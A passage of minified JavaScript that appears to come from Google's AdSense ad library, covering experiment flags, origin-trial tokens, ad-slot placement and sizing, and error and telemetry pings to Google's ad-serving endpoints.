c=[],d={};b.forEach(function(e){c=c.concat(e.Ja||[]);d=r(Object,"assign").call(Object,d,e.Qa)});return new Qd(c,d)} function Sd(a){switch(a){case 1:return new Qd(null,{google_ad_semantic_area:"mc"});case 2:return new Qd(null,{google_ad_semantic_area:"h"});case 3:return new Qd(null,{google_ad_semantic_area:"f"});case 4:return new Qd(null,{google_ad_semantic_area:"s"});default:return null}} function Td(a){if(null==a)a=null;else{var b=Md(a);a=[];b=u(b);for(var c=b.next();!c.done;c=b.next()){c=c.value;var d=String(c.ca);a.push(c.X+"."+(20>=d.length?d:d.slice(0,19)+"_"))}a=new Qd(null,{google_placement_id:a.join("~")})}return a};var Ud={},Vd=new Qd(["google-auto-placed"],(Ud.google_reactive_ad_format=40,Ud.google_tag_origin="qs",Ud));function Wd(a){J.call(this,a)}v(Wd,J);function Xd(a){J.call(this,a)}v(Xd,J);Xd.prototype.getName=function(){return A(this,4)};function Yd(a){J.call(this,a)}v(Yd,J);function Zd(a){J.call(this,a)}v(Zd,J);function $d(a){J.call(this,a)}v($d,J);var ae=[1,2,3];function be(a){J.call(this,a)}v(be,J);function ce(a){J.call(this,a,-1,de)}v(ce,J);var de=[6,7,9,10,11];function ee(a){J.call(this,a,-1,fe)}v(ee,J);function ge(a){J.call(this,a)}v(ge,J);function he(a){J.call(this,a)}v(he,J);var fe=[1],ie=[1,2];function je(a){J.call(this,a,-1,ke)}v(je,J);function le(a){J.call(this,a)}v(le,J);function me(a){J.call(this,a,-1,ne)}v(me,J);function oe(a){J.call(this,a)}v(oe,J);function pe(a){J.call(this,a)}v(pe,J);function qe(a){J.call(this,a)}v(qe,J);function re(a){J.call(this,a)}v(re,J);var ke=[1,2,5,7],ne=[2,5,6,11];function se(a){J.call(this,a)}v(se,J);function te(a){if(1!=a.nodeType)var b=!1;else if(b="INS"==a.tagName)a:{b=["adsbygoogle-placeholder"];a=a.className?a.className.split(/\s+/):[];for(var c={},d=0;d<a.length;++d)c[a[d]]=!0;for(d=0;d<b.length;++d)if(!c[b[d]]){b=!1;break a}b=!0}return b};function ue(a,b,c){switch(c){case 0:b.parentNode&&b.parentNode.insertBefore(a,b);break;case 3:if(c=b.parentNode){var d=b.nextSibling;if(d&&d.parentNode!=c)for(;d&&8==d.nodeType;)d=d.nextSibling;c.insertBefore(a,d)}break;case 1:b.insertBefore(a,b.firstChild);break;case 2:b.appendChild(a)}te(b)&&(b.setAttribute("data-init-display",b.style.display),b.style.display="block")};function M(a,b){this.h=a;this.defaultValue=void 0===b?!1:b}function N(a,b){this.h=a;this.defaultValue=void 0===b?0:b}function ve(a,b){b=void 0===b?[]:b;this.h=a;this.defaultValue=b};var we=new M(1084),xe=new M(1082,!0),ye=new N(62,.001),ze=new N(1130,100),Ae=new function(a,b){this.h=a;this.defaultValue=void 0===b?"":b}(14),Be=new N(1114,1),Ce=new N(1110),De=new N(1111),Ee=new N(1112),Fe=new N(1113),Ge=new N(1104),He=new N(1108),Ie=new N(1106),Je=new N(1107),Ke=new N(1105),Le=new N(1115,1),Me=new M(1121),Ne=new M(1144),Oe=new M(1143),Pe=new M(316),Qe=new M(313),Re=new M(369),Se=new M(1093),Te=new N(1098),Ue=new M(1129),Ve=new M(1128),We=new M(1026),Xe=new M(1090),Ye=new M(1053, !0),Ze=new M(1162),$e=new M(1120),af=new M(1100,!0),bf=new N(1046),cf=new M(1102,!0),df=new M(218),ef=new M(217),ff=new M(227),gf=new M(208),hf=new M(282),jf=new M(1086),kf=new N(1079,5),lf=new M(1141),mf=new ve(1939),nf=new ve(1934,["A8FHS1NmdCwGqD9DwOicnHHY+y27kdWfxKa0YHSGDfv0CSpDKRHTQdQmZVPDUdaFWUsxdgVxlwAd6o+dhJykPA0AAACWeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiQ29udmVyc2lvbk1lYXN1cmVtZW50IiwiZXhwaXJ5IjoxNjQzMTU1MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlLCJ1c2FnZSI6InN1YnNldCJ9", "A8zdXi6dr1hwXEUjQrYiyYQGlU3557y5QWDnN0Lwgj9ePt66XMEvNkVWOEOWPd7TP9sBQ25X0Q15Lr1Nn4oGFQkAAACceyJvcmlnaW4iOiJodHRwczovL2dvb2dsZXN5bmRpY2F0aW9uLmNvbTo0NDMiLCJmZWF0dXJlIjoiQ29udmVyc2lvbk1lYXN1cmVtZW50IiwiZXhwaXJ5IjoxNjQzMTU1MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlLCJ1c2FnZSI6InN1YnNldCJ9","A4/Htern2udN9w3yJK9QgWQxQFruxOXsXL7cW60DyCl0EZFGCSme/J33Q/WzF7bBkVvhEWDlcBiUyZaim5CpFQwAAACceyJvcmlnaW4iOiJodHRwczovL2dvb2dsZXRhZ3NlcnZpY2VzLmNvbTo0NDMiLCJmZWF0dXJlIjoiQ29udmVyc2lvbk1lYXN1cmVtZW50IiwiZXhwaXJ5IjoxNjQzMTU1MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlLCJ1c2FnZSI6InN1YnNldCJ9"]), of=new M(203),pf=new M(434462125),qf=new M(84),rf=new M(1928),sf=new M(1941),tf=new M(370946349),uf=new M(392736476,!0),vf=new N(406149835),wf=new ve(1932,["AxujKG9INjsZ8/gUq8+dTruNvk7RjZQ1oFhhgQbcTJKDnZfbzSTE81wvC2Hzaf3TW4avA76LTZEMdiedF1vIbA4AAABueyJvcmlnaW4iOiJodHRwczovL2ltYXNkay5nb29nbGVhcGlzLmNvbTo0NDMiLCJmZWF0dXJlIjoiVHJ1c3RUb2tlbnMiLCJleHBpcnkiOjE2NTI3NzQ0MDAsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=","Azuce85ORtSnWe1MZDTv68qpaW3iHyfL9YbLRy0cwcCZwVnePnOmkUJlG8HGikmOwhZU22dElCcfrfX2HhrBPAkAAAB7eyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiVHJ1c3RUb2tlbnMiLCJleHBpcnkiOjE2NTI3NzQ0MDAsImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9", "A16nvcdeoOAqrJcmjLRpl1I6f3McDD8EfofAYTt/P/H4/AWwB99nxiPp6kA0fXoiZav908Z8etuL16laFPUdfQsAAACBeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZXRhZ3NlcnZpY2VzLmNvbTo0NDMiLCJmZWF0dXJlIjoiVHJ1c3RUb2tlbnMiLCJleHBpcnkiOjE2NTI3NzQ0MDAsImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9","AxBHdr0J44vFBQtZUqX9sjiqf5yWZ/OcHRcRMN3H9TH+t90V/j3ENW6C8+igBZFXMJ7G3Pr8Dd13632aLng42wgAAACBeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZXN5bmRpY2F0aW9uLmNvbTo0NDMiLCJmZWF0dXJlIjoiVHJ1c3RUb2tlbnMiLCJleHBpcnkiOjE2NTI3NzQ0MDAsImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9", "A88BWHFjcawUfKU3lIejLoryXoyjooBXLgWmGh+hNcqMK44cugvsI5YZbNarYvi3roc1fYbHA1AVbhAtuHZflgEAAAB2eyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IlRydXN0VG9rZW5zIiwiZXhwaXJ5IjoxNjUyNzc0NDAwLCJpc1N1YmRvbWFpbiI6dHJ1ZSwiaXNUaGlyZFBhcnR5Ijp0cnVlfQ=="]),xf=new N(1935);function O(a){var b="sa";if(a.sa&&a.hasOwnProperty(b))return a.sa;b=new a;return a.sa=b};function yf(){var a={};this.i=function(b,c){return null!=a[b]?a[b]:c};this.j=function(b,c){return null!=a[b]?a[b]:c};this.l=function(b,c){return null!=a[b]?a[b]:c};this.h=function(b,c){return null!=a[b]?a[b]:c};this.m=function(){}}function P(a){return O(yf).i(a.h,a.defaultValue)}function Q(a){return O(yf).j(a.h,a.defaultValue)}function zf(){return O(yf).l(Ae.h,Ae.defaultValue)};function Af(a,b,c){function d(f){f=Bf(f);return null==f?!1:c>f}function e(f){f=Bf(f);return null==f?!1:c<f}switch(b){case 0:return{init:Cf(a.previousSibling,e),ja:function(f){return Cf(f.previousSibling,e)},na:0};case 2:return{init:Cf(a.lastChild,e),ja:function(f){return Cf(f.previousSibling,e)},na:0};case 3:return{init:Cf(a.nextSibling,d),ja:function(f){return Cf(f.nextSibling,d)},na:3};case 1:return{init:Cf(a.firstChild,d),ja:function(f){return Cf(f.nextSibling,d)},na:3}}throw Error("Un-handled RelativePosition: "+ b);}function Bf(a){return a.hasOwnProperty("google-ama-order-assurance")?a["google-ama-order-assurance"]:null}function Cf(a,b){return a&&b(a)?a:null};var Df={rectangle:1,horizontal:2,vertical:4};function Ef(a,b){a.google_image_requests||(a.google_image_requests=[]);var c=Mc("IMG",a.document);c.src=b;a.google_image_requests.push(c)}function Ff(a){var b="https://pagead2.googlesyndication.com/pagead/gen_204?id=dtt_err";Sc(a,function(c,d){c&&(b+="&"+d+"="+encodeURIComponent(c))});Gf(b)}function Gf(a){var b=window;b.fetch?b.fetch(a,{keepalive:!0,credentials:"include",redirect:"follow",method:"get",mode:"no-cors"}):Ef(b,a)};function Hf(){this.j="&";this.i={};this.l=0;this.h=[]}function If(a,b){var c={};c[a]=b;return[c]}function Jf(a,b,c,d,e){var f=[];Sc(a,function(g,h){(g=Kf(g,b,c,d,e))&&f.push(h+"="+g)});return f.join(b)} function Kf(a,b,c,d,e){if(null==a)return"";b=b||"&";c=c||",$";"string"==typeof c&&(c=c.split(""));if(a instanceof Array){if(d=d||0,d<c.length){for(var f=[],g=0;g<a.length;g++)f.push(Kf(a[g],b,c,d+1,e));return f.join(c[d])}}else if("object"==typeof a)return e=e||0,2>e?encodeURIComponent(Jf(a,b,c,d,e+1)):"...";return encodeURIComponent(String(a))} function Lf(a,b){var c="https://pagead2.googlesyndication.com"+b,d=Mf(a)-b.length;if(0>d)return"";a.h.sort(function(m,q){return m-q});b=null;for(var e="",f=0;f<a.h.length;f++)for(var g=a.h[f],h=a.i[g],k=0;k<h.length;k++){if(!d){b=null==b?g:b;break}var l=Jf(h[k],a.j,",$");if(l){l=e+l;if(d>=l.length){d-=l.length;c+=l;e=a.j;break}b=null==b?g:b}}a="";null!=b&&(a=e+"trn="+b);return c+a}function Mf(a){var b=1,c;for(c in a.i)b=c.length>b?c.length:b;return 3997-b-a.j.length-1};function Nf(){this.h=Math.random()}function Of(){var a=Pf,b=w.google_srt;0<=b&&1>=b&&(a.h=b)}function Qf(a,b,c,d,e){if((d?a.h:Math.random())<(e||.01))try{if(c instanceof Hf)var f=c;else f=new Hf,Sc(c,function(h,k){var l=f,m=l.l++;h=If(k,h);l.h.push(m);l.i[m]=h});var g=Lf(f,"/pagead/gen_204?id="+b+"&");g&&Ef(w,g)}catch(h){}};var Rf={overlays:1,interstitials:2,vignettes:2,inserts:3,immersives:4,list_view:5};function Sf(){this.wasPlaTagProcessed=!1;this.wasReactiveAdConfigReceived={};this.adCount={};this.wasReactiveAdVisible={};this.stateForType={};this.reactiveTypeEnabledInAsfe={};this.wasReactiveTagRequestSent=!1;this.reactiveTypeDisabledByPublisher={};this.tagSpecificState={};this.messageValidationEnabled=!1;this.floatingAdsStacking=new Tf;this.sideRailProcessedFixedElements=new p.Set;this.sideRailAvailableSpace=new p.Map} function Uf(a){a.google_reactive_ads_global_state?(null==a.google_reactive_ads_global_state.sideRailProcessedFixedElements&&(a.google_reactive_ads_global_state.sideRailProcessedFixedElements=new p.Set),null==a.google_reactive_ads_global_state.sideRailAvailableSpace&&(a.google_reactive_ads_global_state.sideRailAvailableSpace=new p.Map)):a.google_reactive_ads_global_state=new Sf;return a.google_reactive_ads_global_state} function Tf(){this.maxZIndexRestrictions={};this.nextRestrictionId=0;this.maxZIndexListeners=[]};function Vf(a){a=a.document;var b={};a&&(b="CSS1Compat"==a.compatMode?a.documentElement:a.body);return b||{}}function Wf(a){return Vf(a).clientWidth};function Xf(a){return null!==a&&void 0!==a}function Yf(a,b){if(!b(a))throw Error(String(a));};function Zf(a){return"string"===typeof a}function $f(a){return void 0===a};function ag(a){J.call(this,a,-1,bg)}v(ag,J);var bg=[2,8],cg=[3,4,5],dg=[6,7];var eg;eg={Kb:0,Ya:3,Za:4,$a:5};var fg=eg.Ya,gg=eg.Za,hg=eg.$a;function ig(a){return null!=a?!a:a}function jg(a,b){for(var c=!1,d=0;d<a.length;d++){var e=a[d]();if(e===b)return e;null==e&&(c=!0)}if(!c)return!b}function kg(a,b){var c=H(a,ag,2);if(!c.length)return lg(a,b);a=C(a,1,0);if(1===a)return ig(kg(c[0],b));c=Ta(c,function(d){return function(){return kg(d,b)}});switch(a){case 2:return jg(c,!1);case 3:return jg(c,!0)}} function lg(a,b){var c=Cb(a,cg);a:{switch(c){case fg:var d=Hb(a,3,cg);break a;case gg:d=Hb(a,4,cg);break a;case hg:d=Hb(a,5,cg);break a}d=void 0}if(d&&(b=(b=b[c])&&b[d])){try{var e=b.apply(null,ka(wb(a,8)))}catch(f){return}b=C(a,1,0);if(4===b)return!!e;d=null!=e;if(5===b)return d;if(12===b)a=I(a,Db(a,dg,7));else a:{switch(c){case gg:a=yb(a,Db(a,dg,6));break a;case hg:a=I(a,Db(a,dg,7));break a}a=void 0}if(null!=a){if(6===b)return e===a;if(9===b)return null!=e&&0===Ka(String(e),a);if(d)switch(b){case 7:return e< a;case 8:return e>a;case 12:return Zf(a)&&Zf(e)&&(new RegExp(a)).test(e);case 10:return null!=e&&-1===Ka(String(e),a);case 11:return null!=e&&1===Ka(String(e),a)}}}}function mg(a,b){return!a||!(!b||!kg(a,b))};function ng(a){J.call(this,a,-1,og)}v(ng,J);var og=[4];function pg(a){J.call(this,a)}v(pg,J);function qg(a){J.call(this,a,-1,rg)}v(qg,J);var rg=[5],sg=[1,2,3,6,7];function tg(a){a.Sa.apply(a,ka(ta.apply(1,arguments).map(function(b){return{Xa:4,message:b}})))}function ug(a){a.Sa.apply(a,ka(ta.apply(1,arguments).map(function(b){return{Xa:7,message:b}})))};function vg(a){return function(){var b=ta.apply(0,arguments);try{return a.apply(this,b)}catch(c){}}}var wg=vg(function(a){var b=[],c={};a=u(a);for(var d=a.next();!d.done;c={ea:c.ea},d=a.next())c.ea=d.value,vg(function(e){return function(){b.push('[{"'+e.ea.Xa+'":'+Lb(e.ea.message)+"}]")}}(c))();return"[["+b.join(",")+"]]"});function xg(a,b){if(p.globalThis.fetch)p.globalThis.fetch(a,{method:"POST",body:b,keepalive:65536>b.length,credentials:"omit",mode:"no-cors",redirect:"follow"});else{var c=new XMLHttpRequest;c.open("POST",a,!0);c.send(b)}};function yg(a){var b=void 0===b?xg:b;this.l=void 0===a?1E3:a;this.j=b;this.i=[];this.h=null}yg.prototype.Sa=function(){var a=ta.apply(0,arguments),b=this;vg(function(){b.i.push.apply(b.i,ka(a));var c=vg(function(){var d=wg(b.i);b.j("https://pagead2.googlesyndication.com/pagead/ping?e=1",d);b.i=[];b.h=null});100<=b.i.length?(null!==b.h&&clearTimeout(b.h),b.h=setTimeout(c,0)):null===b.h&&(b.h=setTimeout(c,b.l))})()};function zg(a){J.call(this,a,-1,Ag)}v(zg,J);function Bg(a,b){return Eb(a,1,b)}function Cg(a,b){return Gb(a,2,b)}function Dg(a,b){return zb(a,4,b)}function Eg(a,b){return Gb(a,5,b)}function Fg(a,b){return Ab(a,6,b)}function Gg(a){J.call(this,a)}v(Gg,J);Gg.prototype.V=function(){return C(this,1,0)};function Hg(a,b){return Ab(a,1,b)}function Ig(a,b){return Ab(a,2,b)}function Jg(a){J.call(this,a)}v(Jg,J);var Ag=[2,4,5],Kg=[1,2];function Lg(a){J.call(this,a,-1,Mg)}v(Lg,J);function Ng(a){J.call(this,a,-1,Og)}v(Ng,J);var Mg=[2,3],Og=[5],Pg=[1,2,3,4];function Qg(a){J.call(this,a)}v(Qg,J);Qg.prototype.getTagSessionCorrelator=function(){return C(this,2,0)};function Rg(a){var b=new Qg;return Fb(b,4,Sg,a)}var Sg=[4,5,7];function Tg(a,b,c){var d=void 0===d?new yg(b):d;this.i=a;this.m=c;this.j=d;this.h=[];this.l=0<this.i&&Rc()<1/this.i}function Yg(a,b,c,d,e,f){var g=Ig(Hg(new Gg,b),c);b=Fg(Cg(Bg(Eg(Dg(new zg,d),e),g),a.h),f);b=Rg(b);a.l&&tg(a.j,Zg(a,b));if(1===f||3===f||4===f&&!a.h.some(function(h){return h.V()===g.V()&&C(h,2,0)===c}))a.h.push(g),100<a.h.length&&a.h.shift()}function $g(a,b,c,d){if(a.m){var e=new Lg;b=Gb(e,2,b);c=Gb(b,3,c);d&&Ab(c,1,d);d=new Qg;d=Fb(d,7,Sg,c);a.l&&tg(a.j,Zg(a,d))}} function Zg(a,b){b=Ab(b,1,Date.now());var c=fd(window);b=Ab(b,2,c);return Ab(b,6,a.i)};function ah(){var a={};this.h=(a[fg]={},a[gg]={},a[hg]={},a)};var bh=/^true$/.test("false");function ch(a,b){switch(b){case 1:return Hb(a,1,sg);case 2:return Hb(a,2,sg);case 3:return Hb(a,3,sg);case 6:return Hb(a,6,sg);default:return null}}function dh(a,b){if(!a)return null;switch(b){case 1:return D(a,1);case 7:return I(a,3);case 2:return yb(a,2);case 3:return I(a,3);case 6:return wb(a,4);default:return null}}var eh=vc(function(){if(!bh)return{};try{var a=window.sessionStorage&&window.sessionStorage.getItem("GGDFSSK");if(a)return JSON.parse(a)}catch(b){}return{}}); function fh(a,b,c,d){var e=d=void 0===d?0:d,f,g;O(gh).j[e]=null!=(g=null==(f=O(gh).j[e])?void 0:f.add(b))?g:(new p.Set).add(b);e=eh();if(null!=e[b])return e[b];b=hh(d)[b];if(!b)return c;b=new qg(b);b=ih(b);a=dh(b,a);return null!=a?a:c}function ih(a){var b=O(ah).h;if(b){var c=Wa(H(a,pg,5),function(d){return mg(G(d,ag,1),b)});if(c)return G(c,ng,2)}return G(a,ng,4)}function gh(){this.i={};this.l=[];this.j={};this.h=new p.Map}function jh(a,b,c){return!!fh(1,a,void 0===b?!1:b,c)} function kh(a,b,c){b=void 0===b?0:b;a=Number(fh(2,a,b,c));return isNaN(a)?b:a}function lh(a,b,c){return fh(3,a,void 0===b?"":b,c)}function mh(a,b,c){b=void 0===b?[]:b;return fh(6,a,b,c)}function hh(a){return O(gh).i[a]||(O(gh).i[a]={})}function nh(a,b){var c=hh(b);Sc(a,function(d,e){return c[e]=d})} function oh(a,b,c,d,e){e=void 0===e?!1:e;var f=[],g=[];Ra(b,function(h){var k=hh(h);Ra(a,function(l){var m=Cb(l,sg),q=ch(l,m);if(q){var t,y,F;var z=null!=(F=null==(t=O(gh).h.get(h))?void 0:null==(y=t.get(q))?void 0:y.slice(0))?F:[];a:{t=new Ng;switch(m){case 1:Bb(t,1,Pg,q);break;case 2:Bb(t,2,Pg,q);break;case 3:Bb(t,3,Pg,q);break;case 6:Bb(t,4,Pg,q);break;default:m=void 0;break a}zb(t,5,z);m=t}if(z=m){var E;z=!(null==(E=O(gh).j[h])||!E.has(q))}z&&f.push(m);if(E=m){var S;E=!(null==(S=O(gh).h.get(h))|| !S.has(q))}E&&g.push(m);e||(S=O(gh),S.h.has(h)||S.h.set(h,new p.Map),S.h.get(h).has(q)||S.h.get(h).set(q,[]),d&&S.h.get(h).get(q).push(d));k[q]=l.toJSON()}})});(f.length||g.length)&&$g(c,f,g,null!=d?d:void 0)}function ph(a,b){var c=hh(b);Ra(a,function(d){var e=new qg(d),f=Cb(e,sg);(e=ch(e,f))&&(c[e]||(c[e]=d))})}function qh(){return Ta(r(Object,"keys").call(Object,O(gh).i),function(a){return Number(a)})}function rh(a){Xa(O(gh).l,a)||nh(hh(4),a)};function sh(a){this.methodName=a}var th=new sh(1),uh=new sh(16),vh=new sh(15),wh=new sh(2),xh=new sh(3),yh=new sh(4),zh=new sh(5),Ah=new sh(6),Bh=new sh(7),Ch=new sh(8),Dh=new sh(9),Eh=new sh(10),Fh=new sh(11),Gh=new sh(12),Hh=new sh(13),Ih=new sh(14);function Jh(a,b,c){c.hasOwnProperty(a.methodName)||Object.defineProperty(c,String(a.methodName),{value:b})}function Kh(a,b,c){return b[a.methodName]||c||function(){}} function Lh(a){Jh(zh,jh,a);Jh(Ah,kh,a);Jh(Bh,lh,a);Jh(Ch,mh,a);Jh(Hh,ph,a);Jh(vh,rh,a)}function Mh(a){Jh(yh,function(b){O(ah).h=b},a);Jh(Dh,function(b,c){var d=O(ah);d.h[fg][b]||(d.h[fg][b]=c)},a);Jh(Eh,function(b,c){var d=O(ah);d.h[gg][b]||(d.h[gg][b]=c)},a);Jh(Fh,function(b,c){var d=O(ah);d.h[hg][b]||(d.h[hg][b]=c)},a);Jh(Ih,function(b){for(var c=O(ah),d=u([fg,gg,hg]),e=d.next();!e.done;e=d.next())e=e.value,r(Object,"assign").call(Object,c.h[e],b[e])},a)} function Nh(a){a.hasOwnProperty("init-done")||Object.defineProperty(a,"init-done",{value:!0})};function Oh(){this.l=function(){};this.i=function(){};this.j=function(){};this.h=function(){return[]}}function Ph(a,b,c){a.l=Kh(th,b,function(){});a.j=function(d){Kh(wh,b,function(){return[]})(d,c)};a.h=function(){return Kh(xh,b,function(){return[]})(c)};a.i=function(d){Kh(uh,b,function(){})(d,c)}};function Qh(a,b){var c=void 0===c?{}:c;this.error=a;this.context=b.context;this.msg=b.message||"";this.id=b.id||"jserror";this.meta=c}function Rh(a){return!!(a.error&&a.meta&&a.id)};var Sh=RegExp("^https?://(\\w|-)+\\.cdn\\.ampproject\\.(net|org)(\\?|/|$)");function Th(a,b){this.h=a;this.i=b}function Uh(a,b,c){this.url=a;this.u=b;this.La=!!c;this.depth=null};var Vh=null;function Wh(){if(null===Vh){Vh="";try{var a="";try{a=w.top.location.hash}catch(c){a=w.location.hash}if(a){var b=a.match(/\bdeid=([\d,]+)/);Vh=b?b[1]:""}}catch(c){}}return Vh};function Xh(){var a=void 0===a?w:a;return(a=a.performance)&&a.now&&a.timing?Math.floor(a.now()+a.timing.navigationStart):Date.now()}function Yh(){var a=void 0===a?w:a;return(a=a.performance)&&a.now?a.now():null};function Zh(a,b){var c=Yh()||Xh();this.label=a;this.type=b;this.value=c;this.duration=0;this.uniqueId=Math.random();this.slotId=void 0};var $h=w.performance,ai=!!($h&&$h.mark&&$h.measure&&$h.clearMarks),bi=vc(function(){var a;if(a=ai)a=Wh(),a=!!a.indexOf&&0<=a.indexOf("1337");return a});function ci(){this.i=[];this.j=w||w;var a=null;w&&(w.google_js_reporting_queue=w.google_js_reporting_queue||[],this.i=w.google_js_reporting_queue,a=w.google_measure_js_timing);this.h=bi()||(null!=a?a:1>Math.random())} function di(a){a&&$h&&bi()&&($h.clearMarks("goog_"+a.label+"_"+a.uniqueId+"_start"),$h.clearMarks("goog_"+a.label+"_"+a.uniqueId+"_end"))}ci.prototype.start=function(a,b){if(!this.h)return null;a=new Zh(a,b);b="goog_"+a.label+"_"+a.uniqueId+"_start";$h&&bi()&&$h.mark(b);return a};ci.prototype.end=function(a){if(this.h&&"number"===typeof a.value){a.duration=(Yh()||Xh())-a.value;var b="goog_"+a.label+"_"+a.uniqueId+"_end";$h&&bi()&&$h.mark(b);!this.h||2048<this.i.length||this.i.push(a)}};function ei(){var a=fi;this.m=Pf;this.i=null;this.l=this.I;this.h=void 0===a?null:a;this.j=!1}n=ei.prototype;n.Ua=function(a){this.l=a};n.Ta=function(a){this.i=a};n.Va=function(a){this.j=a};n.oa=function(a,b,c){try{if(this.h&&this.h.h){var d=this.h.start(a.toString(),3);var e=b();this.h.end(d)}else e=b()}catch(h){b=!0;try{di(d),b=this.l(a,new Qh(h,{message:gi(h)}),void 0,c)}catch(k){this.I(217,k)}if(b){var f,g;null==(f=window.console)||null==(g=f.error)||g.call(f,h)}else throw h;}return e}; n.Oa=function(a,b){var c=this;return function(){var d=ta.apply(0,arguments);return c.oa(a,function(){return b.apply(void 0,d)})}}; n.I=function(a,b,c,d,e){e=e||"jserror";try{var f=new Hf;f.h.push(1);f.i[1]=If("context",a);Rh(b)||(b=new Qh(b,{message:gi(b)}));if(b.msg){var g=b.msg.substring(0,512);f.h.push(2);f.i[2]=If("msg",g)}var h=b.meta||{};if(this.i)try{this.i(h)}catch(Jc){}if(d)try{d(h)}catch(Jc){}b=[h];f.h.push(3);f.i[3]=b;d=w;b=[];g=null;do{var k=d;if(Hc(k)){var l=k.location.href;g=k.document&&k.document.referrer||null}else l=g,g=null;b.push(new Uh(l||"",k));try{d=k.parent}catch(Jc){d=null}}while(d&&k!=d);l=0;for(var m= b.length-1;l<=m;++l)b[l].depth=m-l;k=w;if(k.location&&k.location.ancestorOrigins&&k.location.ancestorOrigins.length==b.length-1)for(m=1;m<b.length;++m){var q=b[m];q.url||(q.url=k.location.ancestorOrigins[m-1]||"",q.La=!0)}var t=new Uh(w.location.href,w,!1);k=null;var y=b.length-1;for(q=y;0<=q;--q){var F=b[q];!k&&Sh.test(F.url)&&(k=F);if(F.url&&!F.La){t=F;break}}F=null;var z=b.length&&b[y].url;0!=t.depth&&z&&(F=b[y]);var E=new Th(t,F);if(E.i){var S=E.i.url||"";f.h.push(4);f.i[4]=If("top",S)}var rb= {url:E.h.url||""};if(E.h.url){var Kc=E.h.url.match(Ec),Ug=Kc[1],Vg=Kc[3],Wg=Kc[4];t="";Ug&&(t+=Ug+":");Vg&&(t+="//",t+=Vg,Wg&&(t+=":"+Wg));var Xg=t}else Xg="";rb=[rb,{url:Xg}];f.h.push(5);f.i[5]=rb;Qf(this.m,e,f,this.j,c)}catch(Jc){try{Qf(this.m,e,{context:"ecmserr",rctx:a,msg:gi(Jc),url:E&&E.h.url},this.j,c)}catch(zp){}}return!0};n.Pa=function(a,b){var c=this;b.catch(function(d){d=d?d:"unknown rejection";c.I(a,d instanceof Error?d:Error(d))})}; function gi(a){var b=a.toString();a.name&&-1==b.indexOf(a.name)&&(b+=": "+a.name);a.message&&-1==b.indexOf(a.message)&&(b+=": "+a.message);if(a.stack){a=a.stack;try{-1==a.indexOf(b)&&(a=b+"\n"+a);for(var c;a!=c;)c=a,a=a.replace(/((https?:\/..*\/)[^\/:]*:\d+(?:.|\n)*)\2/,"$1");b=a.replace(/\n */g,"\n")}catch(d){}}return b};var hi=ja(["https://www.googletagservices.com/console/host/host.js"]),ii=ja(["https://www.googletagservices.com/console/panel/index.html"]),ji=ja(["https://www.googletagservices.com/console/overlay/index.html"]);nd(hi);nd(ii);nd(ji);function ki(a,b){do{var c=Nc(a,b);if(c&&"fixed"==c.position)return!1}while(a=a.parentElement);return!0};function li(a,b){for(var c=["width","height"],d=0;d<c.length;d++){var e="google_ad_"+c[d];if(!b.hasOwnProperty(e)){var f=K(a[c[d]]);f=null===f?null:Math.round(f);null!=f&&(b[e]=f)}}}function mi(a,b){return!((Yc.test(b.google_ad_width)||Xc.test(a.style.width))&&(Yc.test(b.google_ad_height)||Xc.test(a.style.height)))}function ni(a,b){return(a=oi(a,b))?a.y:0} function oi(a,b){try{var c=b.document.documentElement.getBoundingClientRect(),d=a.getBoundingClientRect();return{x:d.left-c.left,y:d.top-c.top}}catch(e){return null}}function pi(a){var b=0,c;for(c in Df)-1!=a.indexOf(c)&&(b|=Df[c]);return b} function qi(a,b,c,d,e){if(a!==a.top)return Ic(a)?3:16;if(!(488>Wf(a)))return 4;if(!(a.innerHeight>=a.innerWidth))return 5;var f=Wf(a);if(!f||(f-c)/f>d)a=6;else{if(c="true"!=e.google_full_width_responsive)a:{c=Wf(a);for(b=b.parentElement;b;b=b.parentElement)if((d=Nc(b,a))&&(e=K(d.width))&&!(e>=c)&&"visible"!=d.overflow){c=!0;break a}c=!1}a=c?7:!0}return a} function ri(a,b,c,d){var e=qi(b,c,a,.3,d);!0!==e?a=e:"true"==d.google_full_width_responsive||ki(c,b)?(b=Wf(b),a=b-a,a=b&&0<=a?!0:b?-10>a?11:0>a?14:12:10):a=9;return a}function si(a,b,c){a=a.style;"rtl"==b?a.marginRight=c:a.marginLeft=c} function ti(a,b){if(3==b.nodeType)return/\S/.test(b.data);if(1==b.nodeType){if(/^(script|style)$/i.test(b.nodeName))return!1;try{var c=Nc(b,a)}catch(d){}return!c||"none"!=c.display&&!("absolute"==c.position&&("hidden"==c.visibility||"collapse"==c.visibility))}return!1}function ui(a,b,c){a=oi(b,a);return"rtl"==c?-a.x:a.x} function vi(a,b){var c;c=(c=b.parentElement)?(c=Nc(c,a))?c.direction:"":"";if(c){b.style.border=b.style.borderStyle=b.style.outline=b.style.outlineStyle=b.style.transition="none";b.style.borderSpacing=b.style.padding="0";si(b,c,"0px");b.style.width=Wf(a)+"px";if(0!==ui(a,b,c)){si(b,c,"0px");var d=ui(a,b,c);si(b,c,-1*d+"px");a=ui(a,b,c);0!==a&&a!==d&&si(b,c,d/(a-d)*d+"px")}b.style.zIndex=30}};function wi(a,b){this.l=a;this.j=b}wi.prototype.minWidth=function(){return this.l};wi.prototype.height=function(){return this.j};wi.prototype.h=function(a){return 300<a&&300<this.j?this.l:Math.min(1200,Math.round(a))};wi.prototype.i=function(){};function xi(a,b,c,d){d=void 0===d?function(f){return f}:d;var e;return a.style&&a.style[c]&&d(a.style[c])||(e=Nc(a,b))&&e[c]&&d(e[c])||null}function 